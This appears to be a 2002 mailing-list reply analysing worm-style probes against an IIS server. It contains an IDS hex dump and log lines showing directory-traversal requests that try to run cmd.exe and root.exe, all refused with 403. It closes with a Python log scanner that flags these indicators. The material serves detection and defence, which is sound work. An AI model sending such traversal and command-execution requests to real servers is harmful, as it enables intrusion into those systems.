Wait a minute. Now that I take a minute to look at his logs, the return code
for the GET request is 403 (forbidden), so it looks like the probes are
being rebuffed. Besides, I've seen this guy before:
Answer Section:
    167.107.161.62.IN-ADDR.ARPA, PTR, ca-ol-bordeaux-4-167.abo.wanadoo.fr
Authority Records Section:
    107.161.62.IN-ADDR.ARPA, NS, ns.wanadoo.fr
    107.161.62.IN-ADDR.ARPA, NS, ns2.wanadoo.fr
Additional Records Section:
    ns.wanadoo.fr, A, 193.252.19.10
    ns2.wanadoo.fr, A, 193.252.19.11
2 - 2686 2002-01-14 22:20:14 [arachNIDS] WEB-MISC http directory traversal 
Sensor name interface filter 
0.0.0.1 qfe2  none  
Alert
Group   none  
IP  source addr      dest addr    Ver HdrLen TOS length ID    flags offset TTL chksum
    62.161.107.167   x.x.163.51   4   5      0   136    60860 0     0      111 16378
Options     none  
sourceport destport   R1 R0 URG ACK PSH RST SYN FIN 
2427          80                 X   X  
seq #          ack    offset res window urp chksum 
2742165859 1033622641    5    0   16560   0 27344 
Options     none  
Payload   length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..

It looks like you're OK, but check the patchlevel on your box...

> -----Original Message-----
> From: Mike Burden [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, January 17, 2002 10:18 AM
> To: [EMAIL PROTECTED]
> Subject: RE: [gb-users] Not Gnatbox but security related
> 
> 
> If you HAVE to stick with IIS:
> - Reformat the machine, reload the OS
> - Upgrade IIS to version 5 or later
> - Apply the latest cumulative patch and any

> > 2002-01-17 10:52:31 62.161.107.167 - 10.10.1.1 80 GET 
> > /scripts/root.exe
> > /c+dir 403 www -
> > 2002-01-17 10:52:46 62.161.107.167 - 10.10.1.1 80 GET 
> > /MSADC/root.exe /c+dir
> > 403 www -
> > 2002-01-17 10:52:54 62.161.107.167 - 10.10.1.1 80 GET
> > /c/winnt/system32/cmd.exe /c+dir 403 www -
> 

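The exchange above turns on two things: the probes are worm-style requests for root.exe, cmd.exe and a URL-encoded "../" traversal, and the IIS log shows 403 for each, so they were refused. The following is an added example, not from the thread or from Gnatbox: a small Python scanner over IIS W3C log lines that flags those indicators and reports whether each probe was rebuffed or answered 200. The field order of the log lines is an assumption modelled on the three quoted entries, and the sample lines (including a constructed 200 hit) are constructed, not taken from the poster's server.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS log lines modelled on the entries quoted in the thread.
# The last two lines are invented: one traversal probe that got a 200, and one
# ordinary request, so the scanner has something to distinguish.
SAMPLE_LOG = """\
2002-01-17 10:52:31 62.161.107.167 - 10.10.1.1 80 GET /scripts/root.exe /c+dir 403 www -
2002-01-17 10:52:46 62.161.107.167 - 10.10.1.1 80 GET /MSADC/root.exe /c+dir 403 www -
2002-01-17 10:52:54 62.161.107.167 - 10.10.1.1 80 GET /c/winnt/system32/cmd.exe /c+dir 403 www -
2002-01-17 10:53:02 62.161.107.167 - 10.10.1.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 www -
2002-01-17 10:55:00 10.10.1.50 - 10.10.1.1 80 GET /index.html - 200 www -
"""

# Assumed W3C extended field order (date time c-ip cs-username s-ip s-port
# cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent)).
FIELDS = ["date", "time", "c_ip", "user", "s_ip", "s_port", "method",
          "uri_stem", "uri_query", "status", "host", "user_agent"]

# Indicators taken from the probes in the thread: the worm-dropped root.exe
# shell, direct cmd.exe requests, and plain or encoded "../" traversal.
SUSPICIOUS_STEMS = ("cmd.exe", "root.exe")
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def parse_line(line):
    """Split one log line into a dict, or return None if it does not fit."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def normalize_path(stem):
    """Decode the URI stem the way the server eventually sees it.

    Decoding twice turns %252f into %2f and then into "/", so a double-encoded
    traversal is compared in the same form as a plain one. Backslashes are
    folded to "/" and case is ignored because the Windows filesystem is.
    """
    decoded = unquote(unquote(stem))
    return decoded.replace("\\", "/").lower()


def classify(entry):
    """Return a finding dict for a suspicious entry, or None for benign ones."""
    path = normalize_path(entry["uri_stem"])
    hits = [s for s in SUSPICIOUS_STEMS if path.endswith(s)]
    if TRAVERSAL.search(path):
        hits.append("traversal")
    if not hits:
        return None
    status = int(entry["status"])
    # A 2xx means the request was served, i.e. the command likely ran;
    # anything else (403, 404, ...) means IIS refused it.
    outcome = "succeeded" if 200 <= status < 300 else "rebuffed"
    return {"client": entry["c_ip"], "time": entry["time"], "path": path,
            "indicators": hits, "status": status, "outcome": outcome}


def scan(log_text):
    """Scan a block of log text and return the list of findings, in order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['status']} {f['outcome']:9} "
              f"{','.join(f['indicators'])} {f['path']}")
```

Run against a real IIS log, the line that matters is any "succeeded" entry: the three 403s in the thread are noise from an already-infected host elsewhere, but a 200 on the same path would mean the traversal worked and the box needs the patchlevel check the reply recommends.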